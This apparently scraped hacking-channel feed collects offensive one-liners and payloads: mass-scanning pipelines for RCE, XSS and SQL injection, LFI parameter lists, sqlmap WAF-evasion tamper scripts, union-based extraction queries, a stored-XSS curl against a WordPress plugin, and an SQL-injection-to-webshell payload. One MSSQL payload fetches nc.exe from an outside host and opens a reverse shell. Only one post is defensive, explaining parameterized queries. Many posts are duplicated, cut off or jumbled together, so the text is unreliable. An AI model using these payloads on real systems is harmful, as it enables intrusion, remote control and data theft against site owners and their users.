One liner to find RCE
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
π₯7π2π1
Metode untuk mencari kerentanan Sqli :
Command Line Tools Like a Pro
1.
2.
3.
4.
5.
#sqli #sql
Command Line Tools Like a Pro
1.
sublist3r -d target | tee -a domains.txt
2.
cat domains.txt | httpx | tee -a alive.txt
3.
cat alive.txt | waybackurls | tee -a urls.txt
4.
gf sqli urls >> sqli.txt
5.
sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent
#sqli #sql
β€5π₯2π2π1
One line to find an XSS vulnerability, you can edit and add other things
#xss
echo "testphp.vulnweb.com" | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq
#xss
β€3π¦3
SQLMap from Waybackurls
#sql
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#sql
π2π2
LFI Vulnerability Testing
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#LFI
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#LFI
π4
ββTransition from SQL injection to shell or backdoor
We use the βinto outfileβ command to write to a file:
We capture the request in Burp Proxy and save it to the post-request file, then run
sqlmap:
reverse netcat shell via mssql injection when xp_cmdshell is available:
#sql #shell
We use the βinto outfileβ command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
We capture the request in Burp Proxy and save it to the post-request file, then run
sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
reverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#sql #shell
π¦3β2π₯2β€1π1
In SQLMap, the tamper module plays a crucial role by modifying or "tampering" with the SQL queries sent to the database. This helps bypass security mechanisms such as Web Application Firewalls (WAFs) or detection systems.
Tamper scripts manipulate SQL queries in various ways, making them less recognizable to security filters or even allowing the queries to slip through undetected. Here are some commonly used tamper scripts in SQLMap:
1- space2comment
Converts spaces in the query to comments (/**/) to make it less obvious to security mechanisms.
2- charunicodeencode
Encodes characters in the query into Unicode format, helping to evade detection by some systems
3- between
Uses the BETWEEN operator instead of = for comparisons in the query, which can bypass basic filters.
4- randomcase
Randomly changes the case of characters (uppercase/lowercase) in the query to make pattern recognition harder.
5- apostrophemask
Escapes single quotes (') by adding a backslash (\) before them to avoid detection.
6- equaltolike
Replaces = with LIKE in the query to bypass filters that detect equality operators.
7- space2dash
Converts spaces into dashes (--), which are considered comments in SQL, making the query less recognizable.
8- versionedkeywords
Adds version comments to SQL keywords, for example, turning SELECT into SELECT/*version*/, which can evade simple keyword filters.
You can use tamper modules in SQLMap by specifying the --tamper option. For example:
#sql #waf
Tamper scripts manipulate SQL queries in various ways, making them less recognizable to security filters or even allowing the queries to slip through undetected. Here are some commonly used tamper scripts in SQLMap:
1- space2comment
Converts spaces in the query to comments (/**/) to make it less obvious to security mechanisms.
2- charunicodeencode
Encodes characters in the query into Unicode format, helping to evade detection by some systems
3- between
Uses the BETWEEN operator instead of = for comparisons in the query, which can bypass basic filters.
4- randomcase
Randomly changes the case of characters (uppercase/lowercase) in the query to make pattern recognition harder.
5- apostrophemask
Escapes single quotes (') by adding a backslash (\) before them to avoid detection.
6- equaltolike
Replaces = with LIKE in the query to bypass filters that detect equality operators.
7- space2dash
Converts spaces into dashes (--), which are considered comments in SQL, making the query less recognizable.
8- versionedkeywords
Adds version comments to SQL keywords, for example, turning SELECT into SELECT/*version*/, which can evade simple keyword filters.
You can use tamper modules in SQLMap by specifying the --tamper option. For example:
sqlmap -u "http://example.com/vuln.php?id=1" --tamper="space2comment"
Each tamper script serves a specific purpose, and it's often necessary to experiment with different ones depending on the target's security mechanisms.
#sql #waf
β€5π3
SQL injection: what is it and what is it used for? SQL injection is an attack that can lead to sensitive data being compromised and even an entire system takeover. It is important for developers and system administrators to be aware of this threat and take necessary measures to prevent it. Using prepared statements with parameterized queries, input validation and sanitization, and regular security checks can significantly reduce the risk of a successful attack. - Here is an example of code vulnerable to SQL injection:
In this example, the PHP script attempts to authenticate the user by checking the username and password against the entries in the Users table. However, there is a significant issue with this code: it directly includes user input (the $username and $password) in the SQL query without properly validating or sanitizing it.
Vulnerability
This lack of validation means that if malicious input is entered in the username or password fields, it may lead to unintended commands being executed. For instance, if an attacker inputs:
The resulting SQL query would look like this:
In this case, the -- sequence comments out the rest of the SQL query, effectively bypassing the password verification. As a result, the attacker could gain unauthorized access.
Prevention
To eliminate this vulnerability, user input must be validated and processed correctly. One effective method is to use parameterized query statements. This approach ensures that user input is treated as data rather than executable code. The modified query would look like this:
By using parameterized queries, the user input is treated as a string, preventing SQL injection attacks.
Conclusion
Always validate and sanitize user inputs and utilize parameterized queries to enhance the security of your applications against SQL injection attacks.
#sql
<?php
// Get username and password from the request
$username = $_POST["username"];
$password = $_POST["password"];
// Create SQL query to check credentials
$query = "SELECT * FROM users
WHERE username = '$username'
AND password = '$password'";
// Execute the query
$result = mysqli_query($connection, $query);
// Check if the login was successful
if (mysqli_num_rows($result) > 0) {
// Login successful
// Here you can redirect the user to the homepage or show a welcome message
} else {
// Login failed
// Here you can display an error message
}
?>
>
In this example, the PHP script attempts to authenticate the user by checking the username and password against the entries in the Users table. However, there is a significant issue with this code: it directly includes user input (the $username and $password) in the SQL query without properly validating or sanitizing it.
Vulnerability
This lack of validation means that if malicious input is entered in the username or password fields, it may lead to unintended commands being executed. For instance, if an attacker inputs:
username: admin' --
The resulting SQL query would look like this:
SELECT * FROM users WHERE username = 'admin' --' AND password = 'whatever_password_entered'
In this case, the -- sequence comments out the rest of the SQL query, effectively bypassing the password verification. As a result, the attacker could gain unauthorized access.
Prevention
To eliminate this vulnerability, user input must be validated and processed correctly. One effective method is to use parameterized query statements. This approach ensures that user input is treated as data rather than executable code. The modified query would look like this:
$stmt = $connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
By using parameterized queries, the user input is treated as a string, preventing SQL injection attacks.
Conclusion
Always validate and sanitize user inputs and utilize parameterized queries to enhance the security of your applications against SQL injection attacks.
#sql
π8π6β€4π₯1π1
π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the
database:
Now, to determine if there is Union π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the database:
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
default request
default request
default request
not same as Default
So we understand that we have 3 columns
Now with:
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
same as default request
same as default request
same as default request
not same as Default
So we understand that we have 3 columns
Now with:
#sqli
ππ»
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the
database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 # same as
default request
page/?id=54 order by 2 # same as
default request
page/?id=54 order by 3 # same as
default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 #
same as default request
page/?id=54 order by 2 #
same as default request
page/?id=54 order by 3 #
same as default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
#sqli
ππ»
Salesforce
Salesforce UK: The #1 AI CRM
Salesforce is the #1 AI CRM, helping companies become Agentic Enterprises where humans and agents drive success together through a unified AI, data, and Customer 360 platform.
π2β€1
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLI
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLI
π2
SQL injection.pdf
599.4 KB
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the
client to the application.
client to the application.
β€5π1
My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/Directory Traversal) vulnerability has been identified on NASA.GOV. This vulnerability allows attackers to exploit insecure file path injection to access sensitive files. On the NASA system
https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19
https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19
π₯11π1π1
CVE-2024-10793
WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1
WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \-d 'action=destroy-sessions&user_id=<script>alert("XSS")</script>'
β€5